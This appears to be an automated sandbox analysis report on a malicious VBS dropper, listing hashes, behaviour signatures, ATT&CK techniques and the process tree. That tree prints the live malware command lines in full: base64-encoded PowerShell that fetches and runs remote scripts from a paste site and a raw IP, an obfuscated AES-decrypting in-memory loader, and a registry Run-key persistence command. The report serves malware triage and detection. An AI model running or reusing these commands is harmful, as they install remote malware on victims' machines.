ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4

General

Target

ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4.vbs
Size

273KB
MD5

d3a2ad6fb6dab0fa9dc4372edd2e2c36
SHA1

01e30df2eed8f6945c8705e1289f1a5fb874f9ad
SHA256

ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4
SHA512

c698631d9d5c76b4e6d99a22d3057f0c030865098ab156eff7070c672230af0718dc970542cc96d31defe23ce1aa5b6ef4b42c41d2f1f60ee4ec10a54b9543a6
SSDEEP

6144:uvpZGWTfNhok1a5w8PQAb4zfn2Lhi0XmQU8o:4pEYlM5w84icSh5Xm7

Score

8^/10

discovery execution persistence

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2524	powershell.exe
780	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "C:\\Users\\Admin\\dwm.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
780	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2524	powershell.exe
780	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2524	powershell.exe
Token: SeDebugPrivilege	780	powershell.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 1484 wrote to memory of 2416	1484	WScript.exe	31
PID 1484 wrote to memory of 2416	1484	WScript.exe	31
PID 1484 wrote to memory of 2416	1484	WScript.exe	31
PID 2416 wrote to memory of 1028	2416	cmd.exe	33
PID 2416 wrote to memory of 1028	2416	cmd.exe	33
PID 2416 wrote to memory of 1028	2416	cmd.exe	33
PID 1028 wrote to memory of 2524	1028	cmd.exe	35
PID 1028 wrote to memory of 2524	1028	cmd.exe	35
PID 1028 wrote to memory of 2524	1028	cmd.exe	35
PID 1028 wrote to memory of 2932	1028	cmd.exe	36
PID 1028 wrote to memory of 2932	1028	cmd.exe	36
PID 1028 wrote to memory of 2932	1028	cmd.exe	36
PID 1028 wrote to memory of 780	1028	cmd.exe	37
PID 1028 wrote to memory of 780	1028	cmd.exe	37
PID 1028 wrote to memory of 780	1028	cmd.exe	37
PID 1028 wrote to memory of 780	1028	cmd.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ec46d289d2a013fffc92559385cb6e168f18aa85acff11d80e8eb2c96cf343f4.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1484
- C:\Windows\System32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -noprofile -windowStyle Hidden -ep bypass -command "Invoke-Expression ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aWV4IChJbnZva2UtV2ViUmVxdWVzdCAtVXJpICJodHRwczovLzB4MC5zdC84WDVULnBzMSIp')))"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2524
  - - C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "dwm" /t REG_SZ /d "C:\Users\Admin\dwm.bat" /f
      4⤵
      Adds Run key to start application
      PID:2932
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hiDDen -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3T2k4dk1UVTJMakkxTXk0eU5UQXVOakk2TlRBd01DOWtiM2R1Ykc5aFpDOUhaVzVsY21GMFpXUlRZM0pwY0hRdWNITXhJaWs9JykpKTtlbXB0eXNlcnZpY2VzIC1ldHc7U3RhcnQtU2xlZXAgLVNlY29uZHMgMTA7ZnVuY3Rpb24gcWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCgkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3gxd0YxZndiMlhia0N0SEgyd0NaR1FnY3UyZDB2ZVFlYUNVZzJsV2RlYTg9Jyk7CSRhZXNfdmFyLklWPVtTeXN0ZW0uQ29udmVydF06OignZ25pcnRTNDZlc2FCbW9yRidbLTEuLi0xNl0gLWpvaW4gJycpKCc3UEo3ZkNYVnltb3F2VDFhOFdpSFRBPT0nKTsJJGRlY3J5cHRvcl92YXI9JGFlc192YXIuQ3JlYXRlRGVjcnlwdG9yKCk7CSRyZXR1cm5fdmFyPSRkZWNyeXB0b3JfdmFyLlRyYW5zZm9ybUZpbmFsQmxvY2soJHBhcmFtX3ZhciwgMCwgJHBhcmFtX3Zhci5MZW5ndGgpOwkkZGVjcnlwdG9yX3Zhci5EaXNwb3NlKCk7CSRhZXNfdmFyLkRpc3Bvc2UoKTsJJHJldHVybl92YXI7fWZ1bmN0aW9uIGdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMoJHBhcmFtX3Zhcil7CUlFWCAnJHRxY21oemh6d2RhaGNsdmRnZWtxdnFjY3c9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFBQUJCQkNDQ2VtQUFBQkJCQ0NDb3JBQUFCQkJDQ0N5U0FBQUJCQkNDQ3RyQUFBQkJCQ0NDZWFBQUFCQkJDQ0NtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTsJSUVYICckdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcz1OZXctT2JqZWN0IFN5c3RlbS5JTy5BQUFCQkJDQ0NNQUFBQkJCQ0NDZUFBQUJCQkNDQ21BQUFCQkJDQ0NvQUFBQkJCQ0NDckFBQUJCQkNDQ3lBQUFCQkJDQ0NTQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0NlQUFBQkJCQ0NDYUFBQUJCQkNDQ21BQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJGNudHBnZG56cG1ld3JpdW90b2lhZGl1bWM9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FBQUJCQkNDQ29tQUFBQkJCQ0NDcHJBQUFCQkJDQ0NlQUFBQkJCQ0NDc3NBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDR1pBQUFCQkJDQ0NpcEFBQUJCQkNDQ1N0QUFBQkJCQ0NDcmVBQUFCQkJDQ0NhbUFBQUJCQkNDQygkdHFjbWh6aHp3ZGFoY2x2ZGdla3F2cWNjdywgW0lPLkNBQUFCQkJDQ0NvbUFBQUJCQkNDQ3ByQUFBQkJCQ0NDZXNBQUFCQkJDQ0NzaUFBQUJCQkNDQ29uQUFBQkJCQ0NDLkNvQUFBQkJCQ0NDbXBBQUFCQkJDQ0NyZUFBQUJCQkNDQ3NzQUFBQkJCQ0NDaUFBQUJCQkNDQ29BQUFCQkJDQ0NuQUFBQkJCQ0NDTW9kZV06OkRBQUFCQkJDQ0NlQUFBQkJCQ0NDY0FBQUJCQkNDQ29tcEFBQUJCQkNDQ3JlQUFBQkJCQ0NDc3MpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5Db3B5VG8oJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MpOwkkY250cGdkbnpwbWV3cml1b3RvaWFkaXVtYy5EaXNwb3NlKCk7CSR0cWNtaHpoendkYWhjbHZkZ2VrcXZxY2N3LkRpc3Bvc2UoKTsJJHV2a2huam1vb2R2YXlreG5rZGF2bGlnY3MuRGlzcG9zZSgpOwkkdXZraG5qbW9vZHZheWt4bmtkYXZsaWdjcy5Ub0FycmF5KCk7fWZ1bmN0aW9uIGRyZWt5c21ubXl6YmxxdnVscm5wa2Rjc3VyaXBtbGxtbWh4KCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbG1iaGttcGlvbHdzemh6aGFpeXRxc3VmZ3N1eWNwdXNobXZxbXNmej1bU3lzdGVtLlJBQUFCQkJDQ0NlQUFBQkJCQ0NDZmxBQUFCQkJDQ0NlY3RBQUFCQkJDQ0Npb0FBQUJCQkNDQ24uQUFBQkJCQ0NDQXNBQUFCQkJDQ0NzZUFBQUJCQkNDQ21iQUFBQkJCQ0NDbEFBQUJCQkNDQ3lBQUFCQkJDQ0NdOjpMQUFBQkJCQ0NDb0FBQUJCQkNDQ2FBQUFCQkJDQ0NkQUFBQkJCQ0NDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkPSRsbWJoa21waW9sd3N6aHpoYWl5dHFzdWZnc3V5Y3B1c2htdnFtc2Z6LkFBQUJCQkNDQ0VBQUFCQkJDQ0NuQUFBQkJCQ0NDdEFBQUJCQkNDQ3JBQUFCQkJDQ0N5QUFBQkJCQ0NDUEFBQUJCQkNDQ29BQUFCQkJDQ0NpQUFBQkJCQ0NDbkFBQUJCQkNDQ3RBQUFCQkJDQ0M7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7CUlFWCAnJG9vZHh5dnRnaXNkenZzbXNzdmFyc3FnenFkbG5sanZpZHllYnB4aGx6b3FqbXV4cHpkLkFBQUJCQkNDQ0lBQUFCQkJDQ0NuQUFBQkJCQ0NDdkFBQUJCQkNDQ29BQUFCQkJDQ0NrQUFBQkJCQ0NDZUFBQUJCQkNDQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUFBQkJCQ0NDJywgJycpO30kbnljcHNkcWZmd3VsdnJib29kdmZ4cWdjbyA9ICRlbnY6VVNFUk5BTUU7JHZramx1dmR1a2NyZnV1enhqeXRna2tjbXkgPSAnQzpcVXNlcnNcJyArICRueWNwc2RxZmZ3dWx2cmJvb2R2ZnhxZ2NvICsgJ0FBQUJCQkNDQ1xBQUFCQkJDQ0NkQUFBQkJCQ0NDd0FBQUJCQkNDQ21BQUFCQkJDQ0MuQUFBQkJCQ0NDYkFBQUJCQkNDQ2FBQUFCQkJDQ0N0QUFBQkJCQ0NDJy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmtqbHV2ZHVrY3JmdXV6eGp5dGdra2NteTskYXFmenU9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCR2a2psdXZkdWtjcmZ1dXp4anl0Z2trY215KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkZnl1IGluICRhcWZ6dSkgewlpZiAoJGZ5dS5TdGFydHNXaXRoKCc6OicpKQl7CQkkbGh4bXQ9JGZ5dS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWo9W3N0cmluZ1tdXSRsaHhtdC5TcGxpdCgnXCcpO0lFWCAnJGJ6ZGxrdmV6aGltbGFncWd5aXBta2doZWh6a2dxZGJmb21sPWdyeGhrZXBneXBnbmhld2JxdHJ3bGNrc3h1anpld3Rscnh3anNkZmMgKHFjanlnaWRtZmtqbXNqbnZmemZkYXBscGdqd2Jibm5vZHRlcmJ0aGggKFtBQUFCQkJDQ0NDQUFBQkJCQ0NDb0FBQUJCQkNDQ25BQUFCQkJDQ0N2QUFBQkJCQ0NDZUFBQUJCQkNDQ3J0XTo6QUFBQkJCQ0NDRkFBQUJCQkNDQ3JBQUFCQkJDQ0NvQUFBQkJCQ0NDbUFBQUJCQkNDQ0JBQUFCQkJDQ0NhQUFBQkJCQ0NDc2U2QUFBQkJCQ0NDNEFBQUJCQkNDQ1NBQUFCQkJDQ0N0QUFBQkJCQ0NDcmlBQUFCQkJDQ0NuQUFBQkJCQ0NDZ0FBQUJCQkNDQygkY2lsaWJ6eXN4anFvd3ZtYmdzb2FzcmJkZXR6b21nZ3BqaWpbMF0pKSk7Jy5SZXBsYWNlKCdBQUFCQkJDQ0MnLCAnJyk7SUVYICckY2NnZGZvcnV1cml6aXZhaGh0d3l2cnpla2x4amVoZ3hudm89Z3J4aGtlcGd5cGduaGV3YnF0cndsY2tzeHVqemV3dGxyeHdqc2RmYyAocWNqeWdpZG1ma2ptc2pudmZ6ZmRhcGxwZ2p3YmJubm9kdGVyYnRoaCAoW0FBQUJCQkNDQ0NBQUFCQkJDQ0NvQUFBQkJCQ0NDbkFBQUJCQkNDQ3ZBQUFCQkJDQ0NlQUFBQkJCQ0NDckFBQUJCQkNDQ3RdOjpBQUFCQkJDQ0NGQUFBQkJCQ0NDckFBQUJCQkNDQ29BQUFCQkJDQ0NtQUFBQkJCQ0NDQkFBQUJCQkNDQ2FBQUFCQkJDQ0NzQUFBQkJCQ0NDZUFBQUJCQkNDQzZBQUFCQkJDQ0M0QUFBQkJCQ0NDU0FBQUJCQkNDQ3RyQUFBQkJCQ0NDaUFBQUJCQkNDQ25BQUFCQkJDQ0NnKCRjaWxpYnp5c3hqcW93dm1iZ3NvYXNyYmRldHpvbWdncGppalsxXSkpKTsnLlJlcGxhY2UoJ0FBQUJCQkNDQycsICcnKTtkcmVreXNtbm15emJscXZ1bHJucGtkY3N1cmlwbWxsbW1oeCAkYnpkbGt2ZXpoaW1sYWdxZ3lpcG1rZ2hlaHprZ3FkYmZvbWwgJG51bGw7ZHJla3lzbW5teXpibHF2dWxybnBrZGNzdXJpcG1sbG1taHggJGNjZ2Rmb3J1dXJpeml2YWhodHd5dnJ6ZWtseGplaGd4bnZvICgsW3N0cmluZ1tdXSAoJyVBQUFCQkJDQ0MnKSk7')) | Invoke-Expression"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:780

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\c.bat

Filesize
265KB

MD5
6e899645463d001464d3b7d1ffe224fa

SHA1
04d16d1d22358ec0f5100855cf7a105096c8beb3

SHA256
80226cfbbd380486029f9f2b06af35c1b7ae4efabe32eaf653ad4e846eeab7fb

SHA512
e0b29154049fcfc760d42dc31857d66a2e460c3e882cfd5341aeea8c975d3e1fb91d02744e313aa844695b8900cc821d2f8ce06afd8326df06719152072b526e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EE1X0GGE8X8RU4IGHVMR.temp

Filesize
7KB

MD5
27f6634bc7b7b20346d237dd163445cf

SHA1
b04c7171cc1074ccab4b893cb669a3feb772d2f9

SHA256
bfb100aff52f581313dc28bf59c7a18d5df0a0410e5d076e1709f4ede3314332

SHA512
45815fdf8fd48264500c72fb1816c8ff60a9d5375fa9cb9f7725770fa4f161063849f9096e01f495088dccc00ff152d2b64690aa5a47d4283b9006e2deebc248

Download Submit
memory/2524-13-0x000007FEF5FBE000-0x000007FEF5FBF000-memory.dmp

Filesize
4KB

Download
memory/2524-15-0x0000000001DD0000-0x0000000001DD8000-memory.dmp

Filesize
32KB

Download
memory/2524-14-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2524-16-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-17-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-19-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download
memory/2524-18-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads